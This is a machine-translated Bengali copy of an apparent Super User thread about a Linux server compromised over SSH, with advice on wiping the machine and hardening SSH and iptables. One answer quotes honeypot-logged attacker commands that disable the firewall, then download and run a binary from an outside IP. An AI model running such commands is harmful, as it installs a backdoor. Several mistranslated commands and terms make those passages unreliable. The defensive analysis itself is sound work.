আপনি যখন নিশ্চিত হন যে এটি কাজ করে তখন সার্ভারে (= যে মেশিনের সাথে আপনি সংযোগ করতে চান) ফাইলটি সম্পাদনা করুন /etc/ssh/sshd_configএবং লাইনটি পরিবর্তন করুন

#PasswordAuthentication yes

প্রতি

PasswordAuthentication no

এবং sshপরিষেবাটি পুনঃসূচনা করুন ( service ssh restartবা systemctl restart ssh, বা ডিস্ট্রোর উপর নির্ভর করে এরকম কিছু)।

এটি অনেকটা সহ্য করবে। প্রকৃতপক্ষে, বর্তমানে ব্যবহৃত সংস্করণগুলি openssh v2এবং আরএসএ দ্বারা নিযুক্ত হিসাবে ব্যবহার করা হিসাবে কোনও ज्ञিত শোষণ নেই openssh v2

শেষ অবধি, আপনার মেশিনটি সত্যিই বল্টু করার জন্য আপনাকে ফায়ারওয়াল (নেটফিল্টার / iptables) নিম্নলিখিত হিসাবে কনফিগার করতে হবে:

 iptables -A INPUT -p tcp --dport YourChosenNonStandardPort -j ACCEPT
 iptables -A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
 iptables -P INPUT DROP
 iptables -P OUTPUT ACCEPT
 iptables -A INPUT -i lo -j ACCEPT
 iptables -A OUTPUT -o lo -j ACCEPT

এটি, ল্যান এবং ডাব্লুএইচএস উভয়ই এসএসএস সংযোগের অনুমতি দেয়, ২) আপনার অনুরোধের দ্বারা উদ্ভূত সমস্ত ইনপুট মঞ্জুরি দেয় (উদাহরণস্বরূপ, আপনি যখন কোনও ওয়েব পৃষ্ঠা লোড করেন), 3) ইনপুটটিতে অন্য কিছুর ড্রপ দেয়, ৪) সমস্ত কিছুকে অনুমতি দেয় আউটপুট এবং 5-6) লুপব্যাক ইন্টারফেসের সমস্ত কিছুর অনুমতি দেয়।

আপনার চাহিদা বাড়ার সাথে সাথে আরও বেশি বন্দরগুলি খোলার দরকার রয়েছে, আপনি তালিকার শীর্ষে, যুক্ত বিধিগুলি যোগ করে এটি করতে পারেন:

 iptables -A INPUT -p tcp --dport 80 -j ACCEPT

উদাহরণস্বরূপ লোকেরা আপনার ওয়েব ব্রাউজারে অ্যাক্সেস করার অনুমতি দেয়।


11
এটি পড়ার জন্য দুর্দান্ত ছিল। আমি yjz1গুগলস ভাইরাসটোটাল ডট কমের মাধ্যমে ফাইলটি চেষ্টা করেছিলাম যা ইতিবাচক দিয়েছে। এমনকি yjzডাউনলোড করা হয়েছে তা আমি দেখতে পাইনি । ধন্যবাদ।
ভায়ড

34
stringsঅবিশ্বস্ত ডেটা চালানোর ক্ষেত্রে সতর্কতা অবলম্বন করুন। lcamtuf.blogspot.com/2014/10/…
ম্যাট

5
@ ম্যাটনার্ডহফ এটি দেখানোর জন্য ধন্যবাদ, আমি আনন্দের সাথে এ সম্পর্কে অসচেতন ছিলাম। যাইহোক, আমার ডেবিয়ানে 'স্ট্রিংস' কমান্ডটি আপনি উড়ন্ত রঙের সাথে সংযুক্ত পরীক্ষাটি পাস করেন। আমার ধারণা, এটি ম্যানুয়ালটিতে বলা হয়েছে: -এ ... সাধারণত এটি পূর্বনির্ধারিত আচরণ । চিয়ার্স।
মারিয়াসমাতুটিয়া

32
এই উত্তরটি এমন একটি দৃষ্টিভঙ্গি দেখায় যা একটি দৃষ্টান্ত হওয়া উচিত: ১. ব্যর্থ চেষ্টায় আপনার মনোযোগ যেন অন্যদিকে না ঘুরতে থাকে তবে সতর্ক হন। ২) আক্রমণকারীর সফল ক্রিয়াগুলি আলাদা করে দিন। ৩. আক্রমণকারী কীভাবে এবং কীভাবে করেছে তা অধ্যয়ন করুন। ৪. স্ক্র্যাচ থেকে বা সর্বশেষ নিরবচ্ছিন্ন (আক্রমনাত্মক) ব্যাকআপ থেকে সমস্ত ইনস্টল করুন, আপনার প্রয়োজনীয় অতিরিক্ত সুরক্ষাগুলি যোগ করে (পয়েন্ট 3)। ৫. অন্যকে তাদের রক্ষা করতে সহায়তা করুন (আপোসড / সন্দেহযুক্ত আইপি-র তালিকা)।
হাস্তুর

11
[@ মারিয়াসমাতুটিয়ায় মন্তব্য করার পরে এটিকে ছড়িয়ে দেওয়া হয়েছে] - তবুও, ওপিকে বুঝতে হবে যে একটি আপোস করা সিস্টেমের মধ্যে, প্রতিটি নির্বাহযোগ্যকে অবশ্যই দূষিত, এমনকি শেল ls, whoবা অন্য কিছু বিবেচনা করা উচিত । আপোস করা সিস্টেমে কোনও এক্সিকিউটেবল ব্যবহার করে "ডেটা উদ্ধার" (যেমন scpবা rsync) আরও বেশি মেশিনে আপস করতে পারে।
দুবু

142

ইন্টারনেটে আপনাকে স্বাগতম - যেখানে কোনও ওপেন এসএসএইচ সার্ভার সম্ভবত অনুসন্ধান করা, নিষ্ঠুর-বাধ্য হয়ে এবং এতে বিভিন্ন রকমের ক্ষোভ চাপিয়ে দেবে।

শুরু করার জন্য, আপনাকে পণ্যটির স্টোরেজটি পুরোপুরি মুছতে হবে। আপনি যদি এটি ফরেনসিকের জন্য পাস করতে চান তবে এটি চিত্র করুন, তবে এটিতে লিনাক্স ইনস্টল করা সন্দেহজনক।

অনুমানের বিট কিন্তু

  1. আপনি নিষ্ঠুরভাবে বাধ্য হয়েছেন বা একটি সাধারণ পাসওয়ার্ড ব্যবহার করেছেন। এটি অস্পষ্টতার দ্বারা সুরক্ষিত তবে আপনি অভিধানের পাসওয়ার্ড চান না বা এসএসএইচে খোলা কোনও রুট অ্যাকাউন্ট ব্যবহার করবেন না । কোনও বিকল্প হলে রুট এসএসএইচ অ্যাক্সেস অক্ষম করুন বা নাম অন্তত পরিবর্তন করুন যাতে তাদের উভয়ই অনুমান করা দরকার। রুট হিসাবে এসএসএইচিং কোনওভাবেই ভয়ঙ্কর সুরক্ষা অনুশীলন। যদি আপনাকে অবশ্যই রুট ব্যবহার করতে হয় তবে অন্য ব্যবহারকারী হিসাবে লগ ইন করুন এবং স্যুইচ করতে su বা sudo ব্যবহার করুন।

  2. পণ্যের উপর নির্ভর করে, আপনি কোনও উপায়ে এসএসএইচ অ্যাক্সেসটি লকড করতে চাইতে পারেন। মোট লক-ডাউন একটি ভাল ধারণা মত শোনাচ্ছে এবং ব্যবহারকারীদের এটি প্রয়োজন হিসাবে এটি খোলার অনুমতি দেয় । আপনি কী কী সংস্থানগুলি এড়াতে পারবেন তার উপর নির্ভর করে কেবলমাত্র আপনার নিজের সাবনেটে কোনও আইপি ঠিকানা বা কোনও ধরণের লগইন থ্রোটলিং সিস্টেমে অনুমতি দেওয়া বিবেচনা করুন। আপনার যদি চূড়ান্ত পণ্যটির প্রয়োজন না হয় তা নিশ্চিত হয়ে নিন যে এটি বন্ধ আছে turned

  3. একটি মানহীন বন্দর ব্যবহার করুন। অস্পষ্টতার দ্বারা সুরক্ষা আবার, তবে এর অর্থ একটি আক্রমণকারীকে আপনার বন্দরকে লক্ষ্য করা দরকার।

  4. কোনও ডিফল্ট পাসওয়ার্ড ব্যবহার করবেন না। আমি যে সর্বোত্তম পন্থা দেখেছি তা হল এলোমেলোভাবে কোনও নির্দিষ্ট ডিভাইসের জন্য একটি পাসওয়ার্ড তৈরি করা এবং এটি আপনার পণ্যটির সাথে চালিয়ে দেওয়া। সেরা অনুশীলন হ'ল মূল ভিত্তিক প্রমাণীকরণ, তবে আপনি কীভাবে একটি বিপণন পণ্যের পণ্যটিতে এটি ব্যবহার করতে চান তা আমার কোনও ধারণা নেই।


76
৫. যদি সম্ভব হয় তবে সর্বজনীন কী প্রবন্ধটি ব্যবহার করুন। পাসওয়ার্ডের লেখকটি অনেক বেশি নিরাপদ।
বব

4
হ্যাঁ, তবে এটি যদি কোনও গ্রাহক ডিভাইস হয় তবে এটি কোনও বিকল্প হতে পারে না। একটি দেব বাক্সে, এটি একটি উজ্জ্বল ধারণা মত শোনাচ্ছে। একটি সার্ভারে, ভাল, আমি এর আগে হ্যাক হয়ে গিয়েছিলাম; পি
জার্নম্যান গিক

2
এটি যদি ভোক্তা ডিভাইস হয় তবে তাদের সমস্তের জন্য একই র্যান্ডম পাসওয়ার্ড বা কীটিও একটি খারাপ ধারণা। যেমনটি এর ক্রমিক নম্বর, এর ম্যাক বা অন্যথায় শনাক্তযোগ্য তথ্যের উপর ভিত্তি করে কিছু রয়েছে। (এমন অনেক কিছুই যা সোহো মডেম / রাউটার / ডাব্লুএইপিগুলি মিস করেছে বলে মনে হয়)।
হেনেস

2
এটি একটি ভোক্তা ডিভাইস। তবে লক্ষ্যবস্তু গ্রাহকের বিশাল সংখ্যাগরিষ্ঠ এসএসএইচ কী তা জানতে যথেষ্ট শিক্ষিত হবে না। সুতরাং এসএসএইচ বন্ধ করা যেতে পারে এবং সম্ভবত এটি বন্ধ হয়ে যায়।
16:39 এ ভোদা

2
এছাড়াও, ব্যর্থ 2ban ব্যবহার করুন ।
শাদুর

34

ওহ, আপনাকে অবশ্যই হ্যাক করা হয়েছে। কেউ মনে হয় রুট শংসাপত্রগুলি অর্জন করতে সক্ষম হয়েছেন এবং আপনার সিস্টেমে কোনও ট্রোজান ডাউনলোড করার চেষ্টা করেছেন। মারিয়াসমাতুটিয় পে-লোডের বিশ্লেষণ সরবরাহ করেছিল।

দুটি প্রশ্ন উত্থাপিত হয়: ক) আক্রমণকারী সফল ছিল কি? এবং খ) আপনি এটি সম্পর্কে কী করতে পারেন?

প্রথম প্রশ্নের উত্তর একটি নম্বর হতে পারে। লক্ষ্য করুন যে আক্রমণকারী কীভাবে বারবার সাফল্য ছাড়াই পে-লোড ডাউনলোড ও চালানোর চেষ্টা করে। আমি সন্দেহ করি যে কোনও কিছু (SELinux, perchance?) তার পথে দাঁড়িয়েছিল।

হ্যাভার: আক্রমণকারী আপনার /etc/rc.d/rc.localফাইলটিও পরিবর্তিত করেছিল , এই আশায় যে আপনি যখন আপনার সিস্টেমটি পুনরায় চালু করবেন, তখন পেডলোডটি সক্রিয় হবে। আপনি যদি এখনও সিস্টেমটি পুনরায় চালু না করেন, আপনি এই পরিবর্তনগুলি সরিয়ে না দেওয়া পর্যন্ত পুনরায় আরম্ভ করবেন না /etc/rc.d/rc.local। আপনি যদি ইতিমধ্যে এটি পুনরায় চালু করে থাকেন ... ভাল, শক্ত ভাগ্য।

আপনি এটি সম্পর্কে কী করতে পারেন: করণীয় সবচেয়ে নিরাপদ কাজ হল সিস্টেমটি মুছতে এবং স্ক্র্যাচ থেকে পুনরায় ইনস্টল করা। তবে এটি সর্বদা একটি বিকল্প হতে পারে না। একটি উল্লেখযোগ্যভাবে কম নিরাপদ কাজ হ'ল কী ঘটেছে ঠিক তা বিশ্লেষণ করা এবং যদি আপনি পারেন তবে এর প্রতিটি ট্রেস মুছে ফেলুন। আবার, আপনি যদি এখনও সিস্টেমটি পুনরায় চালু না করে থাকেন তবে সম্ভবত এটি সমস্ত /etc/rc.d/rc.localকিছু পরিষ্কার হয়ে যায় , আক্রমণকারী দ্বারা ডাউনলোড করা কোনও কিছু সরিয়ে ফেলুন এবং শেষ পর্যন্ত নয়, রঙিন পাসওয়ার্ডটি পরিবর্তন করুন!

তবে, আক্রমণকারী যদি ইতিমধ্যে পে-লোড চালাতে সক্ষম হয় তবে আপনার সিস্টেমে অন্যান্য পরিবর্তনও হতে পারে যা সনাক্ত করা কঠিন হতে পারে। যে কারণে একটি সম্পূর্ণ মুছা সত্যই একমাত্র নিরাপদ (এবং প্রস্তাবিত) বিকল্প। আপনি ইঙ্গিত হিসাবে, প্রশ্নে সরঞ্জাম একটি পরীক্ষা / বিকাশ লক্ষ্য হতে পারে তাই সম্ভবত এটি মুছা যেমন বেদনাদায়ক হয় না এটি অন্যান্য ক্ষেত্রে যেমন হতে পারে।

আপডেট : আমি একটি সম্ভাব্য পুনরুদ্ধার সম্পর্কে কি লিখেছে সত্ত্বেও, আমি MariusMatutiae এর echo করতে ইচ্ছুক খুব শক্তিশালী সম্ভাব্য এই পে লোড এবং ব্যাপ্তি যার ফলে এটি উদ্দিষ্ট সিস্টেমের সংকটাপন্ন করতে পারে দ্বারা সৃষ্ট ক্ষতি অবমূল্যায়ন না সুপারিশ।


2
ধন্যবাদ। আমি সিস্টেম মুছতে সিদ্ধান্ত নিয়েছে। আমি এটি কয়েকবার পুনরায় চালু করেছি তবে কিছু প্রয়োজনীয় ডেটা অনুলিপি করার জন্য। কোনও বাইনারি নেই, কেবল উত্স কোড। আমার ধারণা আমি এখন বেশ নিরাপদ
2'6

একই ল্যানের অন্যান্য বাক্সগুলির কী হবে?
ডাব্লুগ্রোলাউ

ভাল প্রশ্ন. সরবরাহ করা শেল ইতিহাস একই নেটওয়ার্কে অন্য বাক্সগুলি আবিষ্কার এবং সমঝোতার কোনও প্রচেষ্টা নির্দেশ করে না। আরও সাধারণভাবে, যদি আক্রমণকারী কোনও বাক্সে এসএসএইচ (রুট) অ্যাক্সেস অর্জন করে, তবে এটির মূলত অর্থ হ'ল তিনি কোনও ঘেরের ফায়ারওয়ালগুলি ছাড়িয়ে গেছেন। যাইহোক, এটা স্বয়ংক্রিয়ভাবে পরোক্ষভাবে না যে অন্যান্য বক্স আপোস করা হয়: যে unpatched দুর্বলতার মত অন্য কিছু করতে হবে, পাসওয়ার্ড একটি বাক্সে অন্য ইত্যাদি থেকে, অটো-লগইন বাক্সগুলিকে মধ্যে ভাগ
ভিক্টর টথ

18

আমার এসএসডি-হনিপোটও এই ধরণের আক্রমণ দেখেছিল। এই URL থেকে প্রথম ডাউনলোডগুলি শুরু হয়েছিল 2016-01-29 10:25:33 এবং আক্রমণগুলি এখনও চলছে। আক্রমণগুলি আসছে / আসছে

103.30.4.212
111.68.6.170
118.193.228.169

এই আক্রমণকারীদের কাছ থেকে ইনপুটটি ছিল:

পরিষেবা iptables বন্ধ
উইজেট http://222.186.30.209:65534/yjz1
নোহপ / মূল / yjz1> / দেব / নাল 2> & 1 &
chmod 0777 yjz1
chmod u + x yjz1
./yjz1 &
chmod u + x yjz1
./yjz1 &
সিডি / টিএমপি

সুতরাং পরবর্তী সময়ে ব্যাকডোর ইনস্টল করা ব্যতীত অন্য কোনও কার্যক্রম নেই।


সম্মত, এটি একই এমও।
মারিউস ম্যাটুটিয়া

1
@ মারিয়াসমাতুটিয়া তাই তাহলে এটি তখন ম্যানুয়াল হ্যাক নয়? এটি কোনও প্রকারের নিজস্ব ছড়িয়ে পড়া পোকার / বট?
নিক

1
@ নিকজি আমার সর্বোত্তম অনুমান যে এটি কোনও ম্যানুয়াল হ্যাক ছিল না। চীন-ভিত্তিক বোটনেটের উদ্ভাবক হিসাবে একই অফিসে বৈদ কাজ করার সম্ভাবনা কী? কেউ তার মেশিনে একটি ব্যবহারযোগ্য দুর্বলতা খুঁজে পেয়েছেন, সম্ভবত একটি দুর্বল সুরক্ষিত এসএসএস সার্ভার, তার পাসওয়ার্ডকে জোর করে চাপিয়ে দিয়েছিল, অ্যাক্সেস পেয়েছে, নিজেকে আত্মপ্রকাশের সাথে ইনস্টল করার চেষ্টা করেছিল। তবে, আমি এটিও বাজি ধরব যে আক্রমণকারী লিনাক্সের চেয়ে উইন্ডোজের সাথে আরও সাবলীল। তবে আমার কাছে এর কোনও শক্ত প্রমাণ নেই, কেবল শিক্ষিত অনুমান।
মারিয়াসমাতুটিয়া

12

এখানকার প্রত্যেকে দৃ solid় পরামর্শ দিয়েছেন, তবে স্পষ্টতই, আপনার অগ্রাধিকারগুলি সেই সিস্টেম থেকে আপনার কী প্রয়োজন তা যাচাই করা এবং যাচাই করা উচিত, তারপরে এটি পরিচিত-নিরাপদ মিডিয়া থেকে একটি নতুন ইনস্টল দিয়ে মুছে ফেলা উচিত।

আপনার নতুন ইনস্টলড হোস্টকে ইন্টারনেটে সংযুক্ত করার আগে এই ধারণাগুলি দিয়ে চালান:

  1. একটি নতুন অ-রুট ব্যবহারকারী তৈরি করুন এবং সেই ব্যবহারকারী হিসাবে লগ ইন করুন। আপনার কখনই রুট হিসাবে লগইন করতে হবে না, প্রয়োজনের সময় কেবলমাত্র sudo (বিকল্প ব্যবহারকারী করবেন)।

  2. এসই লিনাক্স ইনস্টল করুন, কনফিগারেশন সেটিংস যা বাধ্যতামূলক অ্যাক্সেস নিয়ন্ত্রণ সক্ষম করে: https://wiki.debian.org/SELinux/Setup

  3. আপনার অফিস / বাড়ি এবং ইন্টারনেটের মধ্যে একটি হার্ডওয়্যার ফায়ারওয়াল বিবেচনা করুন। আমি মাইক্রোটিক ব্যবহার করি, যার চমৎকার সম্প্রদায় সমর্থন: http://routerboard.com/

ধরে নিই যে আপনি আপনার প্রদত্ত কাজ শেষ করার জন্য একটি টাইমলাইনে রয়েছেন, কমপক্ষে # 1 করুন। # 3 দ্রুত এবং সস্তা, তবে আপনাকে হয় মেলের প্যাকেজটির জন্য অপেক্ষা করতে হবে, বা দোকানে চালনা করতে হবে।


3
এবং সর্বোপরি, আপনার পিসিটি উন্মুক্ত রুটের অধিবেশন ছাড়াই চালাবেন না!
মারিয়াসমাতুটিয়া

11
  1. কি ডেবিয়ান-armhf আপনার হোস্টনাম? অথবা আপনি কি ডিফল্ট সেটিংস সহ কোনও ডিফল্ট ইনস্টল ব্যবহার করেন? এটি নিয়ে কোনও সমস্যা নেই, তবে আপনার হোস্টকে সরাসরি ইন্টারনেটের সামনে উন্মুক্ত হওয়ার অনুমতি দেওয়া উচিত নয় (উদাহরণস্বরূপ আপনার মডেম দ্বারা সুরক্ষিত নয়)।

  2. দেখে মনে হচ্ছে আসল সমস্যাটি 222.186.30.209 থেকে আসছে (দেখুন http://anti-hacker-alliance.com/index.php?ip=222.186.30.209 )। মাইক্রোসফ্টের আইপি দেখে আপনার খুব বেশি নজর দেওয়া উচিত নয়। আইপিগুলি আরও কম-বেশি নকল / ফাঁকি দেওয়া বরং সহজেই করা যায়।

  3. ইন্টারনেটের সাথে সংযুক্ত হওয়ার একটি সাধারণ উপায় হ'ল আপনার সার্বজনীন আইপি (উদাহরণস্বরূপ 8.8.8.8) থেকে পোর্টগুলির একটি পরিচিত তালিকা আপনার স্থানীয় (যেমন 192.168.1.12) এর কাছে ফরোয়ার্ড করা।

    • উদাহরণস্বরূপ, সমস্ত আগত সংযোগগুলি 8.8.8.8 (সর্বজনীন) থেকে 192.168.1.12 (স্থানীয়) তে ফরোয়ার্ড করবেন না ।

    • ফরোয়ার্ড কেবল 22 এবং 25 পোর্ট (যথাক্রমে এসএসএস এবং আগত মেল)। আপনার অবশ্যই অবশ্যই আপ-টু-ডেট এসএসএস এবং এসএমটিপি প্যাকেজ / লাইব্রেরি থাকা উচিত।

  4. এরপর কি? হোস্টটি সংযোগ বিচ্ছিন্ন করুন এবং শেল স্ক্রিপ্টগুলিতে (আপনার লজ্জা!) হার্ডকডযুক্ত (পাসওয়ার্ড (প্রতিষ্ঠানের সাথে যুক্ত কোনও কম্পিউটারে) কোনও পাসওয়ার্ড পরিবর্তন করুন /etc/shadow


1. হ্যাঁ ডিবিয়ান-আর্ম্ফ হল হোস্টের নাম। ২. হ্যাঁ আমি এই নিবন্ধটি পড়েছি এবং আমি তাদের ওয়েবসাইট cest.microsoft.com এর মাধ্যমে মাইক্রোসফ্টের সাথে যোগাযোগ করেছি। ৩. আমি কেবল 25 এবং 22 ফরওয়ার্ড করেছি, আর কিছুই ফরোয়ার্ড করা হয়নি। ৪. আমি এটি করব
15 এ

"আইপি কম বেশি সহজেই নকল হতে পারে": আমি কোনও সুরক্ষা বা নেটওয়ার্ক বিশেষজ্ঞ নই। কীভাবে সম্ভব?
কেভিনার্পে

@ কেভিনার্পে পৃথক প্রশ্ন হিসাবে এটি সম্ভবত আরও ভাল।
একটি সিভিএন


2
@ আরচেমার: এসএসএইচ টিসিপি; টিসিপি সোর্স আইপি ফেক করা যদি অসম্ভব না হয় তবে কঠিন। প্লাস, উপরে প্রতিষ্ঠিত হিসাবে, মাইক্রোসফ্ট আইপি তাদের ক্লাউড পরিষেবা আউজুরের অন্তর্ভুক্ত, যার অর্থ অন্য কেউ আক্রমণ করার জন্য যে কেউ সেবারের জন্য সময় কিনতে পারে।
nneonneo

9

অন্যরা যেমন বলেছে, এটি খুব পরিষ্কার যে আপনার সার্ভারের সুরক্ষা আপস করা হয়েছে। সবচেয়ে নিরাপদ বিষয় হ'ল এই মেশিনটি মুছে ফেলা এবং পুনরায় ইনস্টল করা।

আপনার প্রশ্নের দ্বিতীয় অংশের উত্তর দেওয়ার জন্য, আপনি যদি সর্বজনীন কী প্রমাণীকরণ ব্যবহার করতে না পারেন তবে আমি কমপক্ষে Fail2Ban সেট আপ করার এবং একটি অ-মানক বন্দরটিতে এসএসএইচ চালানোর পরামর্শ দিচ্ছি। আমি রুট এসএসএইচ অ্যাক্সেসও অক্ষম করি।

Fail2Ban নির্দিষ্ট সময়ে লগ ইন করতে ব্যর্থ আইপি ঠিকানা নিষিদ্ধ করে ব্রুট-ফোর্স আক্রমণ হ্রাস করতে সহায়তা করবে।

অ-মানক পোর্টে শোনার জন্য এসএসডি সেট করা কমপক্ষে আপনার এসএসএইচ সার্ভারের দৃশ্যমানতা হ্রাস করতে সহায়তা করবে। রুট লগন অক্ষম করা আক্রমণ আক্রমণটিকে কিছুটা হ্রাস করে। ইন /etc/sshd_config:

PermitRootLogin no
Port xxxxx

রুট লগইন অক্ষম হয়ে suগেলে আপনাকে একবার সংযোগ স্থাপনের সাথে রুটে স্যুইচ করতে হবে , বা (আরও বেশি পছন্দসই) sudoসুবিধাপ্রাপ্ত কমান্ডগুলি কার্যকর করতে ব্যবহার করতে হবে।


আমি এই দুটিই করেছি, পরামর্শের জন্য ধন্যবাদ।
6'20

8

এসএসএইচ সার্ভার ক্রমাগত ইন্টারনেটে আক্রমণে থাকে। আপনি কিছু কাজ করেন:

  1. ইন্টারনেট অ্যাক্সেসযোগ্য মেশিনগুলির জন্য আপনি খুব সুরক্ষিত এলোমেলো পাসওয়ার্ড ব্যবহার করেছেন তা নিশ্চিত করুন। আমার অর্থ 16 টি অক্ষর বা তারও বেশি এবং সম্পূর্ণ এলোমেলো। একটি পাসওয়ার্ড পরিচালক ব্যবহার করুন যাতে আপনাকে এটি মুখস্ত করতে হবে না। আপনি যদি নিজের পাসওয়ার্ড মুখস্থ করতে পারেন তবে এটি খুব সাধারণ।

  2. আপনার যদি এসএসএইচের প্রয়োজন না হয় তবে এটি বন্ধ করুন। আপনার যদি এটির প্রয়োজন হয় তবে এটি সর্বজনীনভাবে অ্যাক্সেসযোগ্য না প্রয়োজন, এটি একটি উচ্চ, অ-মানক পোর্ট নম্বরে চালান। এটি করার ফলে হ্যাকের প্রচেষ্টা নাটকীয়ভাবে হ্রাস পাবে। হ্যাঁ একজন ডেডিকেটেড হ্যাকার পোর্ট স্ক্যান করতে পারে তবে স্বয়ংক্রিয় বটগুলি এটি খুঁজে পাবে না।

আপনার লেখক লগ থেকে স্নিপেট একটি ব্যর্থ প্রচেষ্টা দেখায়। তবে আপনি যদি আরও তাকান তবে আপনি অবশ্যই একটি সফল লগইন দেখতে পাবেন। এটি আপনি একটি সাধারণ পাসওয়ার্ড ব্যবহার করেন, তারপরে এটি কোনও বটকে প্রবেশ করার জন্য তুচ্ছ।

আপনাকে এই মেশিনটি নেটওয়ার্ক থেকে আলাদা করতে হবে। আপনার যা প্রয়োজন তা খুব সাবধানে পান এবং তারপরে এটি মুছুন।


7
আমি যখন পোর্ট 22 এ ssh চালাতাম, আমার সাধারণত প্রতিদিন হাজার হাজার হ্যাক প্রচেষ্টা থাকত। যখন আমি একটি উচ্চ বন্দর নম্বর (50000 এরও বেশি) এ পরিবর্তন করি তখন এই হ্যাক প্রচেষ্টা সম্পূর্ণভাবে বন্ধ হয়ে যায়।
user1751825

16 টি অক্ষর যথেষ্ট নিরাপদ নয়। ব্যবহারকারীর লগ আউটও সহজ y কেবল এটিকে পারম লকআউট তৈরি করবেন না, এটিকে মেয়াদ উত্তীর্ণ করুন, তবে এটি এক ঘন্টার মতো কিছু করুন। এইভাবে আপনি এখনও সার্ভার অ্যাক্সেস করতে পারেন।
রামহাউন্ড

মনে রাখবেন যে পদক্ষেপ 2) সুরক্ষার জন্য কঠোরভাবে প্রয়োজনীয় নয়, যতক্ষণ আপনার শক্তিশালী প্রমাণীকরণ (পাবলিক কী বা একটি শক্তিশালী পাসওয়ার্ড) থাকে।
ব্যবহারকারী 20574 0

2
@ রামহাউন্ড কেন নয়? এমনকি যদি এটি কেবল ছোট হাতের অক্ষর ছিল তবে 16 ছোট অক্ষরগুলি 43608742899428874059776 সম্ভাবনা দেয় যা বিশেষত এমন একটি অনলাইন ব্রুট-ফোর্সের জন্য যেখানে সার্ভার আপনাকে প্রতিবার প্রচেষ্টা ব্যর্থ করার জন্য আপনাকে অপেক্ষা করতে বাধ্য করে makes
ব্যবহারকারী 20574

3
@ user20574। কঠোরভাবে প্রয়োজনীয় না হলেও, এসএসএইচ পরিষেবাটির দৃশ্যমানতা হ্রাস করা এখনও খুব সহায়ক। এমনকি যদি আপনার লগগুলি থেকে বিশৃঙ্খলা অপসারণ ছাড়া অন্য কোনও কারণ না থাকে। যদি কোনও মেশিন কেবলমাত্র সীমিত গোষ্ঠীর লোকের কাছে অ্যাক্সেসযোগ্য হয়, তবে একটি মানহীন বন্দরটি সুরক্ষা উন্নতির জন্য যথাযথ যুক্তিসঙ্গত পদক্ষেপ।
user1751825

6

ফ্রন্ট-ফেসিং লিনাক্স / ইউনিক্স সার্ভার স্থাপনের পরে যে কেউ / প্রত্যেকের প্রথম কাজটি করা উচিত তা তাৎক্ষণিকভাবে অক্ষম করা root

আপনার সিস্টেম আপোস করা হয়েছিল। আপনার একটি চলমান ইতিহাস লগ রয়েছে যা কিছুটা হলেও দেখার জন্য দুর্দান্ত হতে পারে। তবে সত্যতার সাথে বিশদগুলি ছড়িয়ে দেওয়া কিছুটা নিট-পিক এবং আপনাকে আপনার সার্ভারটি সুরক্ষিত করতে সহায়তা করবে না। এটি বোটনেট ম্যালওয়্যার তৈরি করার সময় ঘটে যাওয়া সমস্ত ধরণের বাজে কথা দেখায় - যা সম্ভবত আপনার সার্ভারে লিনাক্স সিস্টেমকে সংক্রামিত হয়েছিল। @MariusMatutiae দ্বারা উপলব্ধ উত্তর সুন্দর এবং ভাল চিন্তা এবং সেখানে যারা অন্যদের পুনরাবৃত্তি যে আপনার মাধ্যমে হ্যাক্ড হয় rootএক্সেস যা ম্যালওয়ার / বটনেট এর ভিজা স্বপ্ন।

কীভাবে অক্ষম করা যায় rootসে সম্পর্কে কয়েকটি ব্যাখ্যা রয়েছে তবে আমি ব্যক্তিগত অভিজ্ঞতা থেকে জানিয়ে দেব, বেশিরভাগ কিছুই যা আমি এখনই বর্ণনা করব তার বাইরে চলে যাওয়া ওভারকিল। আপনি যখন সার্ভারটি প্রথম সেটআপ করবেন তখন এটি করা উচিত ছিল :

  1. sudoঅধিকার সহ একটি নতুন ব্যবহারকারী তৈরি করুন : নতুন নামের সাথে একটি নতুন ব্যবহারকারী তৈরি করুন - এমন cooldudeকোনও কমান্ড sudo adduser cooldudeব্যবহার করে যেমন আপনি উবুন্টু বা অন্য ধরণের ডেবিয়ান সিস্টেম ব্যবহার করছেন। তারপরে এইভাবে sudoএকটি কমান্ড ব্যবহার করে ম্যানুয়ালি ফাইলটি সম্পাদনা করুন sudo nano /etc/sudoersএবং cooldude ALL=(ALL:ALL) ALLসমান লাইনের নীচে একটি পংক্তি যুক্ত করুন যা পড়তে হবে root ALL=(ALL:ALL) ALL। সম্পন্ন হওয়ার সাথে সাথে লগইন করুন cooldudeএবং অধিকারগুলি কাজ করছে কিনা তা দেখার জন্য কিছুটা বেসিক এবং অ-ধ্বংসাত্মক sudolike এর মতো একটি কমান্ড দিয়ে কমান্ডটি পরীক্ষা করুন । আপনাকে একটি পাসওয়ার্ডের জন্য অনুরোধ করা হতে পারে। ওই কাজগুলো? সব ভালো! পরবর্তী পদক্ষেপের দিকে সরান।sudo wsudo
  2. rootঅ্যাকাউন্টটি লক করুন : ঠিক আছে, এখন এটি অধিকারের cooldudeদায়িত্বে রয়েছে sudo, লগইন করুন cooldudeএবং মূল অ্যাকাউন্টটি লক করতে এই আদেশটি চালান sudo passwd -l root। যদি আপনি কোনও উপায়ে এসএসএইচ কী জুটি তৈরি করে থাকেন তবে কীগুলি rootখুলুন /root/.ssh/authorized_keysএবং সরিয়ে দিন। বা আরও ভাল, এসএসএইচ কী কার্যকরভাবে অক্ষম করতে কেবল authorized_keys_OFFএই ফাইলটির নতুন নাম দিন sudo mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_OFF। আমি পরে পছন্দ করি কারণ অফ-হ্যান্ড সুযোগে আপনার এখনও পাসওয়ার্ড কম লগইন প্রয়োজন, আপনি কেবল সেই ফাইলটি মূল নামটিতে ফিরে যেতে পারেন এবং আপনার যেতে ভাল হওয়া উচিত।

এফডাব্লুআইডাব্লু, আমি কয়েক বছর ধরে (কয়েক দশক?) কয়েক ডজন লিনাক্স সার্ভার পরিচালনা করেছি এবং অভিজ্ঞতা থেকে জানি যে কেবলমাত্র অধিকারকে rootনতুন ব্যবহারকারী স্থাপন করা sudo- লিনাক্স সিস্টেমকে সুরক্ষিত করার সহজতম এবং সবচেয়ে মৌলিক উপায়। একবার rootঅক্ষম হয়ে গেলে আমার কখনই এসএসএইচ এর মাধ্যমে কোনও ধরণের আপোষের সাথে ডিল করতে হয়নি । এবং হ্যাঁ, আপনি লগইন করার চেষ্টা দেখতে পাচ্ছেন auth.logতবে সেগুলি অর্থহীন; যদি rootঅক্ষম থাকে তবে সেই চেষ্টাগুলি কখনই কোনও কিছুর সাথে যুক্ত হবে না। শুধু ফিরে বসে দেখুন এবং চেষ্টা নিরবচ্ছিন্নভাবে ব্যর্থ!

